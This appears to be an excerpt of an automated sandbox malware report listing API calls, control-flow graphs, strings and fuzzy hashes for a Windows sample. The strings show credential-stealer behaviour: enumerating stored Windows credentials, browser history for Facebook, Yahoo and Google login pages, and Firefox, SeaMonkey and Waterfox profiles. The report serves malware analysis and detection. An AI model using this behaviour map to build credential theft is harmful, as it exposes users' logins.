                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                      • String ID:
                                                      • API String ID: 115830560-3916222277
                                                      • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                      • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 764 41837f-4183bf 765 4183c1-4183cc call 418197 764->765 766 4183dc-4183ec call 418160 764->766 771 4183d2-4183d8 765->771 772 418517-41851d 765->772 773 4183f6-41840b 766->773 774 4183ee-4183f1 766->774 771->766 775 418417-418423 773->775 776 41840d-418415 773->776 774->772 777 418427-418442 call 41739b 775->777 776->777 780 418444-41845d CreateFileW 777->780 781 41845f-418475 CreateFileA 777->781 782 418477-41847c 780->782 781->782 783 4184c2-4184c7 782->783 784 41847e-418495 GetLastError free 782->784 787 4184d5-418501 memset call 418758 783->787 788 4184c9-4184d3 783->788 785 4184b5-4184c0 call 444706 784->785 786 418497-4184b3 call 41837f 784->786 785->772 786->772 792 418506-418515 free 787->792 788->787 792->772
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                      • free.MSVCRT ref: 0041848B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CreateFile$ErrorLastfree
                                                      • String ID: |A
                                                      • API String ID: 77810686-1717621600
                                                      • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                      • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 0041249C
                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                      • wcscpy.MSVCRT ref: 004125A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                      • String ID: r!A
                                                      • API String ID: 2791114272-628097481
                                                      • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                      • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                      • wcslen.MSVCRT ref: 0040C82C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                      • API String ID: 2936932814-4196376884
                                                      • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                      • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                      APIs
                                                      • memset.MSVCRT ref: 0040A824
                                                      • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                      • wcscpy.MSVCRT ref: 0040A854
                                                      • wcscat.MSVCRT ref: 0040A86A
                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                      • String ID: C:\Windows\system32
                                                      • API String ID: 669240632-2896066436
                                                      • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                      • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                      APIs
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                      • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                      • wcslen.MSVCRT ref: 0040BE06
                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                      • memset.MSVCRT ref: 0040BE91
                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                      • wcschr.MSVCRT ref: 0040BF24
                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                      • String ID:
                                                      • API String ID: 697348961-0
                                                      • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                      • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                      APIs
                                                      • memset.MSVCRT ref: 00403CBF
                                                      • memset.MSVCRT ref: 00403CD4
                                                      • memset.MSVCRT ref: 00403CE9
                                                      • memset.MSVCRT ref: 00403CFE
                                                      • memset.MSVCRT ref: 00403D13
                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                      • memset.MSVCRT ref: 00403DDA
                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                      • String ID: Waterfox$Waterfox\Profiles
                                                      • API String ID: 4039892925-11920434
                                                      • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                      • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                      APIs
                                                      • memset.MSVCRT ref: 00403E50
                                                      • memset.MSVCRT ref: 00403E65
                                                      • memset.MSVCRT ref: 00403E7A
                                                      • memset.MSVCRT ref: 00403E8F
                                                      • memset.MSVCRT ref: 00403EA4
                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                      • memset.MSVCRT ref: 00403F6B
                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                      • API String ID: 4039892925-2068335096
                                                      • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                      • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                      APIs
                                                      • memset.MSVCRT ref: 00403FE1
                                                      • memset.MSVCRT ref: 00403FF6
                                                      • memset.MSVCRT ref: 0040400B
                                                      • memset.MSVCRT ref: 00404020
                                                      • memset.MSVCRT ref: 00404035
                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                      • memset.MSVCRT ref: 004040FC
                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                      • API String ID: 4039892925-3369679110
                                                      • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                      • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                      APIs
                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                      • API String ID: 3510742995-2641926074
                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                      APIs
                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                      • memset.MSVCRT ref: 004033B7
                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                      • wcscmp.MSVCRT ref: 004033FC
                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                      • String ID: $0.@
                                                      • API String ID: 2758756878-1896041820
                                                      • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                      • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                      APIs
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 2941347001-0
                                                      • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                      • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                      APIs
                                                      • memset.MSVCRT ref: 00403C09
                                                      • memset.MSVCRT ref: 00403C1E
                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                      • wcscat.MSVCRT ref: 00403C47
                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                      • wcscat.MSVCRT ref: 00403C70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                      • API String ID: 1534475566-1174173950
                                                      • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                      • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                      APIs
                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                      • memset.MSVCRT ref: 00414C87
                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                      • wcscpy.MSVCRT ref: 00414CFC
